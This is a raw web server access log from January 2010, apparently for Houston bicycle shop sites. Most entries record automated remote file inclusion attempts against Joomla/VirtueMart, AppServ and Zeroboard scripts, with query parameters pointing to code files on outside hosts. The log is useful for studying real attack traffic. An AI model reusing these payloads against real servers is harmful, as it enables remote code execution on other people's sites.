66.165.122.122 - - [10/Jan/2010:09:54:37 -0800] "GET /translations/Polish.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:09:54:37 -0800] "GET //////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1784 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:09:54:37 -0800] "GET /translations///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3881 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:09:54:38 -0800] "GET /translations/Portuguese.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:09:55:06 -0800] "GET /translations/Polish.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:09:55:06 -0800] "GET //////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1784 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:09:55:06 -0800] "GET /translations///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3881 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:09:55:06 -0800] "GET /translations/Portuguese.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:09:57:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:58:34 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:00:49 -0800] "GET //////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1784 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:00:49 -0800] "GET /translations///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3881 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:00:49 -0800] "GET /translations/Polish.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:00:59 -0800] "GET /translations/Portuguese.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:01:48 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:01:48 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:01:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:02:34 -0800] "GET //////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1784 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:02:34 -0800] "GET /translations///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3881 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:02:35 -0800] "GET /translations/Polish.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:02:36 -0800] "GET /translations/Portuguese.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:10:03:14 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:07:53 -0800] "GET //////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1784 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:07:53 -0800] "GET /translations///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3881 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:07:55 -0800] "GET /translations/Polish.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:07:55 -0800] "GET /translations/Portuguese.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.223.225.130 - - [10/Jan/2010:10:09:14 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [10/Jan/2010:10:10:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
193.19.177.19 - - [10/Jan/2010:10:11:30 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:11:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:11:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:11:38 -0800] "GET /translations/Portuguese.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:11:38 -0800] "GET //////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1784 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:11:41 -0800] "GET /translations/Polish.txt%20%20///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:11:41 -0800] "GET /translations///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3881 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.101.214.54 - - [10/Jan/2010:10:14:53 -0800] "GET /logs////appserv/main.php?appserv_root=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.101.214.54 - - [10/Jan/2010:10:14:53 -0800] "GET /logs/access.log%20%20////appserv/main.php?appserv_root=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.101.214.54 - - [10/Jan/2010:10:14:53 -0800] "GET ///appserv/main.php?appserv_root=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:16:04 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:10:18:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:10:18:11 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [10/Jan/2010:10:18:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [10/Jan/2010:10:19:55 -0800] "GET /logs/access_080810.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
218.145.29.142 - - [10/Jan/2010:10:20:33 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:20:33 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:20:33 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:10:21:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:10:21:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:10:21:25 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:21:55 -0800] "GET /translations/Portuguese.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:22:03 -0800] "GET /translations/Portuguese.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:22:03 -0800] "GET /translations/Polish.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:10:25:30 -0800] "GET /logs/access.log//skin/buzzard_espoon/setup.php?dir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:10:25:30 -0800] "GET /logs//skin/buzzard_espoon/setup.php?dir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:10:25:30 -0800] "GET /skin/buzzard_espoon/setup.php?dir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:10:26:49 -0800] "GET /skin/buzzard_espoon/setup.php?dir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:10:26:49 -0800] "GET /logs/access.log//skin/buzzard_espoon/setup.php?dir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:10:26:49 -0800] "GET /logs//skin/buzzard_espoon/setup.php?dir=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:31:37 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:31:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:31:37 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:31:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:31:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:31:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
85.176.106.151 - - [10/Jan/2010:10:31:45 -0800] "HEAD /robots.txt HTTP/1.1" 404 - "-" "Toplistbot" "bicyclestoreshouston.com"
85.176.106.151 - - [10/Jan/2010:10:31:45 -0800] "GET / HTTP/1.1" 200 1764 "-" "Toplistbot" "bicyclestoreshouston.com"
65.23.156.168 - - [10/Jan/2010:10:31:47 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:32:20 -0800] "GET /translations/Polish.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:32:21 -0800] "GET /translations/Portuguese.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:32:41 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:32:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:32:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
121.101.214.54 - - [10/Jan/2010:10:34:06 -0800] "GET ///appserv/main.php?appserv_root=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.101.214.54 - - [10/Jan/2010:10:34:06 -0800] "GET /logs////appserv/main.php?appserv_root=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.101.214.54 - - [10/Jan/2010:10:34:06 -0800] "GET /logs/access.log%20%20////appserv/main.php?appserv_root=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:36:34 -0800] "GET /translations/Polish.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:36:34 -0800] "GET /translations/Portuguese.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:37:46 -0800] "GET /translations/Portuguese.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.165.122.122 - - [10/Jan/2010:10:37:46 -0800] "GET /translations/Polish.txt///////////////////////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:10:37:57 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:38:25 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:38:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:10:38:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
67.195.37.114 - - [10/Jan/2010:10:48:10 -0800] "GET /temporarypreviewfile.html HTTP/1.0" 200 1690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
75.126.17.250 - - [10/Jan/2010:10:49:57 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=79&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [10/Jan/2010:10:49:57 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=79&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [10/Jan/2010:10:49:57 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=79&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.145.141.36 - - [10/Jan/2010:10:50:23 -0800] "GET /logs/zboard.php?id=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
193.145.141.36 - - [10/Jan/2010:10:50:26 -0800] "GET /logs/access.log/zboard.php?id=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
193.145.141.36 - - [10/Jan/2010:10:50:26 -0800] "GET /zboard.php?id=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:10:52:50 -0800] "GET /logs/////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:10:52:50 -0800] "GET ////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:10:52:50 -0800] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:10:52:51 -0800] "GET ////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:10:52:51 -0800] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:10:52:51 -0800] "GET /logs/////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:55:25 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:55:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:55:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [10/Jan/2010:10:56:06 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=79&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:56:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:56:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:10:56:15 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:11:03:24 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:11:03:24 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [10/Jan/2010:11:10:01 -0800] "GET /translations/?D=D HTTP/1.0" 200 3831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:15:37 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show.image.in.Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:15:37 -0800] "GET /logs//components/com_virtuemart/show.image.in.Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:15:37 -0800] "GET /components/com_virtuemart/show.image.in.Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:11:18:39 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:11:18:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:11:18:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:11:19:23 -0800] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:11:20:30 -0800] "GET /logs/access.log/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:11:20:30 -0800] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.36.2.101 - - [10/Jan/2010:11:20:30 -0800] "GET /logs/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:22:11 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:22:11 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:22:17 -0800] "GET /logs/access.log//components/com_virtuemart/show.image.in.Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
